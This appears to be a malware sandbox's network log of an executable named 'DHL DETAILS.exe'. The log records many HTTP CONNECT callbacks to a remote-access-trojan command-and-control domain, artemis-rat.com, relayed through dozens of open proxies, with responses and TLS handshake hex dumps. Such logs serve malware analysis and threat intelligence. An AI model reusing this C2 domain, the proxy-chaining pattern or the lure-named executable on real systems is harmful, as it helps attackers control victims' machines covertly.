Mar 9, 2024 13:14:13.743360043 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
432	192.168.2.5	51377	157.185.157.151	26589	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.743602037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
433	192.168.2.5	50219	37.187.73.7	16113	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.749696016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.833235979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.833933115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.833228111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.834141016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
434	192.168.2.5	51409	104.21.124.121	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.752588987 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.906922102 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
435	192.168.2.5	51309	113.208.119.142	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.756263971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.125158072 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
436	192.168.2.5	51338	8.213.128.6	50001	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.765110970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.322695017 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:18.326332092 CET	44	IN	HTTP/1.1 200 OK Content-Type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
437	192.168.2.5	51369	98.162.25.29	31679	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.769788027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
438	192.168.2.5	51350	190.103.177.131	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.903204918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.313822985 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:14 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
439	192.168.2.5	51322	65.1.244.232	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.903652906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.286886930 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:14 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:14.287240028 CET	209	OUT	Data Raw: 16 03 03 00 cc 01 00 00 c8 03 03 65 ec 52 94 57 9d 91 e8 6a 84 1a d1 b3 e0 dc 73 3f 26 73 9b 62 b7 d5 ca e9 99 e0 3a 38 34 d8 e8 20 85 d3 f7 c3 9e 04 a8 97 50 86 52 97 88 8c 9a b3 c2 eb 90 03 7f c2 dd 2a db 75 44 f6 60 79 0a 46 00 2a c0 2c c0 2b Data Ascii: eRWjs?&sb:84 PRuD`yF,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:14.670571089 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 12 50 9e f9 87 ff 1d 6f 2d ea ce ff a7 15 4a ac 25 2d c6 e0 73 9a 2e 78 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9Po-J%-s.xDOWNGRD0000H010Uartemis-rat.com0240309113427Z260309113427Z010Uartemis-rat.com0"0H0j/]HB
Mar 9, 2024 13:14:14.672884941 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 61 20 84 a9 8a 1e 95 0d 0c 59 fc 15 d1 c8 33 75 69 48 56 60 9b 8b 2c de c2 96 1f 4e e7 58 19 32 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 c1 03 72 c9 e6 da 8a 26 4d 95 dc 06 23 35 23 69 1e 15 e0 c2 39 Data Ascii: %! a Y3uiHV`,NX2(r&M#5#i9b"
Mar 9, 2024 13:14:15.054948092 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 a9 3b 22 ce b5 b5 15 0c 72 4f 3b 72 b6 0c ac 61 fe 37 6e 0a cf a9 33 e4 8d 68 3a e9 f7 7a e8 77 a7 f5 ea 72 4e fb 26 a5 Data Ascii: (;"rO;ra7n3h:zwrN&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
440	192.168.2.5	51336	49.4.48.128	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.903759003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
441	192.168.2.5	51376	43.163.192.3	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.903831005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
442	192.168.2.5	51353	47.243.205.1	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.904417992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
443	192.168.2.5	51352	45.138.87.238	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.904680014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
444	192.168.2.5	51423	142.4.123.41	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.905494928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
445	192.168.2.5	51359	185.49.30.5	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.906569004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
446	192.168.2.5	50278	178.33.163.156	42380	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.907017946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.036334038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.039345026 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.130038023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.146460056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
447	192.168.2.5	51433	104.27.15.161	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.907211065 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.061325073 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
448	192.168.2.5	51368	43.131.242.162	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.908242941 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
449	192.168.2.5	51403	184.178.172.14	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.908664942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
450	192.168.2.5	51412	174.64.199.82	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.910075903 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
451	192.168.2.5	50350	72.195.114.169	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.910170078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
452	192.168.2.5	50329	51.158.64.130	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.910463095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.036403894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.039338112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
453	192.168.2.5	50424	50.62.134.139	62607	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.912780046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
454	192.168.2.5	50343	89.46.249.148	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.913059950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.781507969 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
455	192.168.2.5	50249	91.134.140.160	48962	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.913290977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.411246061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.926932096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.951030970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
456	192.168.2.5	50372	174.77.111.196	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.913563967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
457	192.168.2.5	51371	49.228.131.169	5000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.913598061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
458	192.168.2.5	51379	193.239.58.92	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.913830996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
459	192.168.2.5	51424	98.162.25.4	31654	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.914067030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
460	192.168.2.5	51365	37.156.146.163	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.914308071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.692461014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.950427055 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.248996973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.924870968 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
461	192.168.2.5	51375	190.128.228.182	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.914376020 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:14.629370928 CET	1286	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:14 GMT Server: Apache/2.4.56 (Ubuntu) Set-Cookie: PHPSESSID=tdh0qj5hpm21ekvpbug0bv7d11; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Length: 5101 Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 